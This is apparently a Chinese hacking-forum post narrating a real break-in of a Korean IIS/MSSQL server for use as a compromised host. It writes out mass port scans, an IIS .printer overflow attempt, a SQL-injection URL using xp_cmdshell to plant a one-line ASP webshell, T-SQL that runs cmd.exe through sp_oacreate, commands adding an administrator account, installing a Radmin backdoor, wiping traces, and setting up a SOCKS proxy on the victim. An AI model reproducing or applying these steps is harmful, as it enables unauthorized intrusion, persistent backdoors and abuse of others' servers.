爱华网第一步
扫描
Usage: s TCP/SYN StartIP Ports
这个扫描软件是我扫肉鸡的得力助手
_______________________________________________________________
Microsoft Windows 2000
(C) 版权所有 1985-2000 Microsoft Corp.
中 =CYC= 国
D:s>s tcp xx.xx.0.1 xx.xx.255.255 3389 50 /save
D:s>s tcp 10.0.0.1 10.0.0.10 80 /save
TCP Port Scanner V1.1 By WinEggDrop
Normal Scan: About To Scan 10.0.0.1:10 Using 80 Thread
Scan xx.xx.xx.xx Complete In 3 Hours 34 Minutes 4 Seconds. Found 65536 Open Ports
________________________________________________________________
这个软件 可以用 syn 和TCP 2种, SYN 速度快,有些人喜欢用它搜索肉鸡,但是我喜欢 TCP
因为比较稳定。看大家了。
这样,到 根目录下就会生成一个文件 Result 扫描的结果就在这里
要注意一点,就是后面的线程 要根据自己的机器和网络速度而定!!!
下面就是 Result 的结果
-------------------------------------------------------------------------------
Performing Time: 11/21/2005 10:41:56 --> Normal Scan: About To Scan 65536 IP For 1 Ports Using 300 Thread
xx.xx.xx.xx 3389 open
xx.xx.xx.xx 3389 open
xx.xx.xx.xx 3389 open
xx.xx.xx.xx 3389 open
xx.xx.xx.xx 3389 open
xx.xx.xx.xx 3389 open
xx.xx.xx.xx 3389 open
.......
好,第二步了
通过我们得到的IP逐一攻克
首先找一个
xxx.xxx.xxx.69
让我们用溜光分析一下 (结果)
80(HTTP)
110(POP3)
443(HTTPS)
1433(MSSQL)
3389(TERMINAL)
25(SMTP)
CGI扫描
WEB版本信息: Microsoft-IIS/5.0
WWW 标题: XXX (都是看不懂的韩文,还好我的同屋有一个韩国人,^_^)
--------------------------------------------------------------------------------
Plugins
IIS5.0 .Printer Exploit(Grant System Privileges)
IIS 5.0 WEBDAV Exploit
第一眼我看见了80,这个是一个服务器了
其次是 1433
而且有漏洞,我到网上下了个iis5hack 配合NC 进行溢出
————————————————————————————
Microsoft Windows 2000
(C) 版权所有 1985-2000 Microsoft Corp.
中 =CYC= 国
D:s>iis5hack XXX.XXX.XXX.69 80 7 1999
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
—————————————————————————————
然后开NC
这里面系统是我估计对方是win2k sp1 (后面证明了我是对的)
结果失败
大家不要放弃。。再来(已经很晚了,和朋友聊了聊天,给他发几个共享软件,然后就去睡觉了)
第2天 我针对 服务器的80 端口进行分析。首先我打开了他的网页。分析他的代码。还不错,估计是他们在别的网站DOWN下来的 没有什么漏洞
当我看到最后一页的新闻时候(新闻还是我同屋告诉我的,要不我也看不明白),发现了这个
http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?id=1278
利用简单的命令试验了一下
http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:cyc.asp';--
发现客写入,哈哈!!!!(心里自然的。。。。欢快起来)
让我看看他的SQL版本拉
http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?id=1278and 1=(select @@VERSION)
看看反馈
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
....../common/500-100.asp,行242
返回回来好多
我已经确定可以注入
好让我来看看能不能建立用户,首先不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD
CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:>c:temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
DROP TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c:temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
好累啊。。。。。。。。。
反复看了好多便。。。还是打错了,干脆,不干托裤子放屁的事情了,到网上找了个 NBSI2API 直接来。
Net user
-------------------------------------------------------------------------------
admin aaaaaa Guest
IUSR_sdfdf aaaaaaaa eradf
Mjaid DJKJIDMKMI hakxie
IKJIMMLL
好,让我们添加一个用户
net use chinahacker ****** /add
成功了(其实我忘记了一个重要的步骤,就是+管理员用户组,因为高兴,忘记了,给自己带来了很多麻烦,大家注意哦,千万不要学我哦)
好开3389 登陆
用刚刚建立的用户名密码登陆,^_^成功了,刚要笑。。。。 系统出来一个提示,(正好我同屋不在。。。)不明白社那马意思。我想应该是对方对IP进行了限制,我问朋友要代理猎手,想找一个韩国的IP而且IP段是在 XXX.XXX.XXX.69这个段里面
同时到我们老大哥论坛发贴提问,想搞一个代理,结果,突然得到了高手的指点,提醒我是不是没有加入管理员组,我一看,可不是么。艾。。。。。。。。。。
加入管理员 Net localgroup administrators chinahacker /add
在登陆,呵呵,成功了
好了现在就是后门了
我选择radmin
我以前发过制作这个木马的教程 所以现在在这里就不讲解了,如果有需要的留下帖子和我联系,我在个别的教给大家
我登陆上我的主页下载了一个,然后用Radmin 连接。。。
成功。。^_^
然后我清理了一下痕迹,推出来,准备作下一步工作,作代理服务器了
当我再次打开Radmin 后,竟然连接不上!!!!!
我满脑的郁闷啊
难道是让人家发现了??????????
啊,讨厌,我在用3389 登陆看看,没有啊。。。我能进入啊,这是什么问题那?
我开始分析
我这回用Dos运行,结果一看,原来我作的自解压里面的 *.vbs 系统不让运行。。
结果无法导入注册表
好,我把 Radmin的 几个文件都上传上去,一个一个的运行,呵呵,成功了,
好在来,^_^,这次没有问题了,成功了
然后我们开始制作代理了
SkSockServer.exe
首先安装
d:sksockserver.exe -install
d:sksockserver.exe -config port 911 (这里输入你要代理的端口)
好了,让我们打开他的服务
Net start skserver
Net start 查看一下
Snake SockProxy Service (已经打开了) ^_^
好,现在让我们用SocksCap 尽情的欢快上网吧
感谢大家的支持,鄙视潜水员
